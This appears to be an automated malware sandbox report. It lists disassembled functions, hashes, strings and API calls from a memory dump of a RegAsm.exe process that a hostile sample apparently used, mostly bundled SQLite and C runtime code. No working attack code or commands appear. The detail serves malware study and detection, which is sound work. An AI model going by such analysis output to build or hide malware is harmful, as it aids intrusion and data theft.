Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
API String ID: 0-2679805236
Opcode ID: 7b9ccf1e6e107fc5083aa17b2fe0d89aa7e04f71581367d3993fd817e786485a
Instruction ID: b551c816a76b50772ed255f1ac37f514f6a3ec2d9f43d6be46b83ce20dd1be43
Opcode Fuzzy Hash: 7b9ccf1e6e107fc5083aa17b2fe0d89aa7e04f71581367d3993fd817e786485a
Instruction Fuzzy Hash: B37106719043968FC704CF28CC85A6AB7E8FFC4A14F4D5569E889D7241FB32E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19B7F0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B7F1E6, 19B7F327
%s at line %d of [%.10s], xrefs: 19B7F1EB, 19B7F32C
unable to delete/modify user-function due to active statements, xrefs: 19B7F157, 19B7F298
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B7F1DC, 19B7F31D

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 853490d5c73c1386b39e0ecbbc2ce11b9bf9bef206d833ea0fe4be16a767c35a
Instruction ID: 23e495eef0efaf001657db107f824d56ab797ff3d3fc6a2a18193414a35769d1
Opcode Fuzzy Hash: 853490d5c73c1386b39e0ecbbc2ce11b9bf9bef206d833ea0fe4be16a767c35a
Instruction Fuzzy Hash: 036166B5A00B416BE7088F20CC46BA777A5EF41704F4D4328F8399B6C2E7A5E554C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 19A909C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 19A90B3B

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
API String ID: 0-2869280805
Opcode ID: 2561447c97d2307c4a6616b9d63cfaf39974e3fe26ffc9c4269c2fbec7cdf8b7
Instruction ID: 56b140da6193382bcac13bd325f5a4338435c39b1b9f487409caa3d1cdabea48
Opcode Fuzzy Hash: 2561447c97d2307c4a6616b9d63cfaf39974e3fe26ffc9c4269c2fbec7cdf8b7
Instruction Fuzzy Hash: D741F37A7013119FD7009F58EC80966F3E8FF84A65B0845BEFA4987A61E772E819C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 19A83F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

remove_diacritics=1, xrefs: 19A83FA2
tokenchars=, xrefs: 19A8406A
remove_diacritics=0, xrefs: 19A83FE1
remove_diacritics=2, xrefs: 19A84021
separators=, xrefs: 19A840A3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 0-131617836
Opcode ID: 83a986c1b3edc1cbb95140fd575a07d06b6d772fbe28720f312535e53f682b37
Instruction ID: 59deefe57408c1379a59b47733b67d2b8c28885c503d35da692c74810dc7937c
Opcode Fuzzy Hash: 83a986c1b3edc1cbb95140fd575a07d06b6d772fbe28720f312535e53f682b37
Instruction Fuzzy Hash: FE51F076A042828BE301DF14D44177BB7F5BB52F26F8C41ACE8864F285DB36EC8A8751

Uniqueness

Uniqueness Score: -1.00%

Function 19A81120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

main, xrefs: 19A811A6
rbu_memory, xrefs: 19A811F5

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: main$rbu_memory
API String ID: 0-3973752345
Opcode ID: 493f4e3cd630e8e5e01cd8bb6f6407403426af4be291d69a658b76ea093df90a
Instruction ID: 29d38f0a61f4521600cfb0baeaf3a49ba79b506a4c50ab220f2c3fa7ffa7acc7
Opcode Fuzzy Hash: 493f4e3cd630e8e5e01cd8bb6f6407403426af4be291d69a658b76ea093df90a
Instruction Fuzzy Hash: 4D51BE756003159FDB008F69D880B67B7E8FB44A1AF08447DE989D7291EB35F80ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 19B89350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4e056a43c2613897325dbf6c4bd1a3aad48422aaa9e19ae305202249bee74e
Instruction ID: d0281d0f472ba6dc8e1a26c2b6fb80ec46021ae01fa17f87c925ac61a5104e22
Opcode Fuzzy Hash: 8d4e056a43c2613897325dbf6c4bd1a3aad48422aaa9e19ae305202249bee74e
Instruction Fuzzy Hash: B351C030800278DBDB105B74DDC8A2737BAFF04E05B494068E98AC3159FB31E456DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 19B115C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

null, xrefs: 19B115EE
JSON cannot hold BLOB values, xrefs: 19B116D9
%!0.15g, xrefs: 19B1160A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$JSON cannot hold BLOB values$null
API String ID: 0-3074873597
Opcode ID: 19a281a1db369ec250699f947b66fb924be63ba813d5d8f46ae6b9f67b9b1396
Instruction ID: 1f49db4c64c62bd8e864e7a674d529995c3064dd0acc88d097d0b480441d6e46
Opcode Fuzzy Hash: 19a281a1db369ec250699f947b66fb924be63ba813d5d8f46ae6b9f67b9b1396
Instruction Fuzzy Hash: 12419EB5B00740AFE3105F54FC82B9B77B4FB41329F0C457AE551C95D2D3AAA59883E1

Uniqueness

Uniqueness Score: -1.00%

Function 19A81D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 19A81E2C
no such database: %s, xrefs: 19A81E05

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
API String ID: 0-1404816483
Opcode ID: 6b3d7e3025a89758e7b065b149ae7f18c664f1a0882de73409ca5e155590bbc9
Instruction ID: 3118db45ce6174750a2e3a40f9307ce12957d56e9c50c7332b5fb59c22964e69
Opcode Fuzzy Hash: 6b3d7e3025a89758e7b065b149ae7f18c664f1a0882de73409ca5e155590bbc9
Instruction Fuzzy Hash: DB318C766003096BC3105F69DC40B6BB7DCFF81666F0955A9FD589B280EA76F80487E0

Uniqueness

Uniqueness Score: -1.00%

Function 004118E0 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(012C3278,?,00000104,00000000,?,00412525,?,012C3278,00000000), ref: 004118ED
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,012C3278,00000000,00000000,?,00412525,?,012C3278,00000000), ref: 0041190B
lstrlen.KERNEL32(?,?,00412525,?,012C3278,00000000,?,?,?,?,?,?,?,00000000), ref: 0041191E
wsprintfA.USER32 ref: 00411931

Strings

%s%s, xrefs: 0041192B
C:\Users\user\Desktop\, xrefs: 00411906, 0041193C
%%A, xrefs: 00411924, 0041192A

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %%A$%s%s$C:\Users\user\Desktop\
API String ID: 1206339513-1083490418
Opcode ID: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction ID: c5a9d92ede5ea4987b478224b8b0572e4dbdbd0cbd861403dae5f6f932e9b4ff
Opcode Fuzzy Hash: b3af0c830d7c66efbf35a3d675616cfa4270fd700d5d968e88c3d55ec8686320
Instruction Fuzzy Hash: 7EF0F0762402096FDB005F5CEC88DEBBBEEEF8A364B505116F9088B300CB359C82C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 19B131F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14293848b40d3a43ab987bd51c2ff8aca95fb87d11e2b8232e80c4ebecb8fdf
Instruction ID: 57b343476e3541354b6eda287b9e70aff39aa8ff180dc0cc0ca32306d48c512b
Opcode Fuzzy Hash: a14293848b40d3a43ab987bd51c2ff8aca95fb87d11e2b8232e80c4ebecb8fdf
Instruction Fuzzy Hash: 14F10471A063419BD700CF24E88175ABBE0FF45324F48467DE89A9F281F336E946CB96

Uniqueness

Uniqueness Score: -1.00%

Function 19B973E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 19B973FD
ase, xrefs: 19B9768D
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 19B9776D
sqlite_temp_master, xrefs: 19B973F2

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
API String ID: 0-231581592
Opcode ID: 1ad927c4bc231e0fbf3edd3662aba03d03b6d4179c21b714f55478c29a4b4039
Instruction ID: a6b08bd78c6b80708b65acaa317dadcc52d6e763613c28e05bad3e41092c4d1c
Opcode Fuzzy Hash: 1ad927c4bc231e0fbf3edd3662aba03d03b6d4179c21b714f55478c29a4b4039
Instruction Fuzzy Hash: 0CE1F4F0A243819FD700CF25C8C0B5ABBE4FF95704F08856CE9899B292E771E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00412070 Relevance: 9.1, APIs: 6, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004120B0
StrCmpCA.SHLWAPI(00000000,00428340,?,?,?,00000000), ref: 004120FC
StrCmpCA.SHLWAPI(00000000,00428344,00000000,?,?,?,00000000), ref: 00412142
StrCmpCA.SHLWAPI(00000000,00428348,?,?,?,00000000), ref: 0041216E
StrCmpCA.SHLWAPI(00000000,0042834C,?,?,?,00000000), ref: 0041219A
strtok_s.MSVCRT ref: 004121CC

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction ID: e7a2fe36a0400bda3f7ffef75447838ffcf0b53659d9e15460f3b2746b801767
Opcode Fuzzy Hash: 8ab808e521ad988e47ca2df6490754f693fd19acd19366fb3acbd8f1064129c7
Instruction Fuzzy Hash: 11419E74600205EFCB10DF58D944BE9B7B8FF15304FA0465EE605D3284DBB9A6B8CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2D7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041C2E5

Part of subcall function 0041ACC3: __mtinitlocknum.LIBCMT ref: 0041ACD9
Part of subcall function 0041ACC3: __amsg_exit.LIBCMT ref: 0041ACE5
Part of subcall function 0041ACC3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822,?,?,0041992B,00000000,0042E920,00419972,0040FCB0), ref: 0041ACED

DecodePointer.KERNEL32(0042E8A8,00000020,0041C428,00000000,00000001,00000000,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D), ref: 0041C321
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C332

Part of subcall function 0041B8AA: EncodePointer.KERNEL32(00000000,0041F47C,00642400,00000314,00000000,?,?,?,?,?,0041C63F,00642400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B8AC

DecodePointer.KERNEL32(-00000004,?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C358
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C36B
DecodePointer.KERNEL32(?,0041C44A,000000FF,?,0041ACEA,00000011,00000000,?,0041B931,0000000D,?,?,0041BD85,0041A822), ref: 0041C375

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction ID: e2b3956bf5e94b2baf730586d1c238e8b3fbb8ba7e12c12fc2e7ba7e24f6204d
Opcode Fuzzy Hash: bb10800c0d419d9d7c04633c4765f91ceac3c517b12544c32c546b9a078549f1
Instruction Fuzzy Hash: 4531293094031ADFDF10AFA5DC846EDBBB2BF49314F64802BE524A6250DBBC58919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0B0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B0BC

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__amsg_exit.LIBCMT ref: 0041B0DC
__lock.LIBCMT ref: 0041B0EC
InterlockedDecrement.KERNEL32(?), ref: 0041B109
_free.LIBCMT ref: 0041B11C
InterlockedIncrement.KERNEL32(004301C0), ref: 0041B134

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
